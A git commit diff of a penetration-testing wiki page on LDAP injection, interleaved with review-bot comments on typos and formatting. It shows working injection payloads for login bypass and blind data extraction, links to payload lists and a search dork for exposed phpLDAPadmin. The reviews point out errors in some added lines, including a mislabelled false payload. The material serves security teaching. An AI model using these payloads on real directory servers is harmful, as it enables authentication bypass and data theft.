GitBook: [master] 2 pages and 4 assets modified

This commit is contained in:
CPol 2021-06-08 21:58:39 +00:00 committed by gitbook-bot
parent c2b98f8fb4
commit a24d4e91d6
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
6 changed files with 32 additions and 15 deletions

Binary file not shown (image asset, modified): 73 KiB before, 96 KiB after

Binary file not shown (image asset, After entry only): 96 KiB

Binary file not shown (image asset, After entry only): 73 KiB

Binary file not shown (image asset, After entry only): 205 KiB

View file

@ -27,30 +27,28 @@
**\(\|\)** = Absolute FALSE **\(\|\)** = Absolute FALSE
For example: For example:
\(&\(!\(objectClass=Impresoras\)\)\(uid=s\*\)\) `(&(!(objectClass=Impresoras))(uid=s*))
\(&\(objectClass=user\)\(uid=\*\)\) (&(objectClass=user)(uid=*))`
You can access to the database, and this can content information of a lot of different types. You can access to the database, and this can content information of a lot of different types.
The backups of LDAP uses the extension _ldif_
**OpenLDAP**: If 2 filters arrive, only executes the first one. **OpenLDAP**: If 2 filters arrive, only executes the first one.
**ADAM or Microsoft LDS**: With 2 filters they throw an error. **ADAM or Microsoft LDS**: With 2 filters they throw an error.
**SunOne Directory Server 5.0**: Execute both filters. **SunOne Directory Server 5.0**: Execute both filters.
**It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.** **It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.**
The filter has to start with: _&_ or _\|_ The filter has to start with: `&` or `|`
Example: _\(&\(directory=val1\)\(folder=public\)\)_ Example: `(&(directory=val1)(folder=public))`
\(&\(objectClass=VALUE1\)\(type=Epson\*\)\) `(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = _\*\)\(ObjectClass=\*\)\)\(&\(objectClass=void_ VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
Then: _\(&\(objectClass=**\*\)\(ObjectClass=\*\)\)**_ will be the first filter \(the one executed\). Then: `(&(objectClass=`**`*)(ObjectClass=*))`** will be the first filter \(the one executed\).
## Login Bypass ## Login Bypass
LDAP supports several formats to store the password: clear, md5, smd5, sh1, ssha, crypt. So, it could be that independently of what you insert inside the password, it is hashed. LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
```bash ```bash
user=* user=*
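Review bot: in the password-scheme line ("LDAP supports several formats to store the password"), the change from "sh1, ssha" to "sh1, sha" drops the salted scheme and keeps the typo; the schemes in use are {SHA} and {SSHA} (next to {CRYPT}, {MD5}, {SMD5}), so the list should read "clear, md5, smd5, sha, ssha, crypt". The new inline code spans that open on one line and close on the next (the `(&(!(objectClass=Impresoras))(uid=s*))` / `(&(objectClass=user)(uid=*))` pair and the `(&(objectClass=VALUE1)(type=Epson*))` / `VALUE1 = ...` pair) will render as a single run-on span in GitBook; a fenced block per pair keeps the two filters on separate lines. The `_ldif_` line appears on only one side of this hunk; if it is being dropped it is worth keeping, with "uses" corrected to "use".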
@ -92,7 +90,7 @@ password=pwd
```bash ```bash
username = admin)(!(&(| username = admin)(!(&(|
pass = any)) pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSO then the user is admin and the password check is True. --> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
``` ```
```bash ```bash
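Review bot: the FALSO/FALSE fix is right, but the explanation on the same line is imprecise: (|) is false, so the inner (&(|)(webpassword=any)) is false and the surrounding `!` makes that branch true whatever the password is; "the password check is True" reads as if the password matched. Suggest "--> since (|) is FALSE, the negated clause is always TRUE, so only uid=admin has to match". The arrow on this line is "—>" while the rest of the file uses "-->"; keep one form.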
@ -107,12 +105,29 @@ password=any
--> (&(uid=admin)) (| (|) (webpassword=any)) --> (&(uid=admin)) (| (|) (webpassword=any))
``` ```
### Lists
[LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt) [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt)
[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt) [LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
[LDAP\_authBypass](https://feelsec.info/wp-content/uploads/2018/11/LDAP_authBypass.txt)
## Blind LDAP Injection ## Blind LDAP Injection
You may force False or True responses to check if any data is returned and confirm a possible Blind LDAP Injection:
```bash
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
```
```bash
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
### Dump data
You can iterate over the ascii letters, digits and symbols: You can iterate over the ascii letters, digits and symbols:
```bash ```bash
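Review bot: the comment on the second blind payload ("#This will result on True, so no information will be returned or shown") contradicts itself; that payload (`void)(objectClass=void))(&objectClass=void`) is the FALSE case and should read "#This will result in False, so no information will be returned or shown" (and "result on True" in the first comment should be "results in True"). The tail of both new payloads, `(&objectClass=void`, is also missing a parenthesis compared with the VALUE1 example earlier in this file (`(&(objectClass=void`); on servers that only run the first filter the tail is discarded, but the file itself notes that SunOne executes both filters and that bad syntax throws an error, so a malformed tail gives an error instead of a clean true/false. Keep the two examples consistent.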
@ -130,7 +145,7 @@ You can iterate over the ascii letters, digits and symbols:
### **Discover valid LDAP fields** ### **Discover valid LDAP fields**
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of **\*\*\[**default LDAP attributes here**\]\(**[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP Injection/Intruder/LDAP\_attributes.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**\)**.\*\* LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of [**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).
```python ```python
#!/usr/bin/python3 #!/usr/bin/python3
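Review bot: the link repair on the "Discover valid LDAP fields" paragraph is correct; while this line is being rewritten, "LDAP objects contains by default several attributes" should be "contain by default several attributes".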
@ -189,5 +204,7 @@ for i in range(50):
intitle:"phpLDAPadmin" inurl:cmd.php intitle:"phpLDAPadmin" inurl:cmd.php
``` ```
## More Payloads
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection) [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection)

View file

@ -25,7 +25,7 @@ These kind of APIs may be [**vulnerable to XXE**](../../pentesting-web/xxe-xee-x
You could also try to use CDATA tags to insert payloads \(as long as the XML is valid\) You could also try to use CDATA tags to insert payloads \(as long as the XML is valid\)
![](../../.gitbook/assets/image%20%28535%29.png) ![](../../.gitbook/assets/image%20%28537%29.png)
### Check Access ### Check Access
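Review bot: this hunk only swaps the reference from image (535).png to image (537).png, and the asset list at the top of the commit shows new image files being added rather than the old one replaced; unless image (535).png is still referenced elsewhere it is left orphaned in .gitbook/assets. Check whether the old asset should be deleted in the same commit.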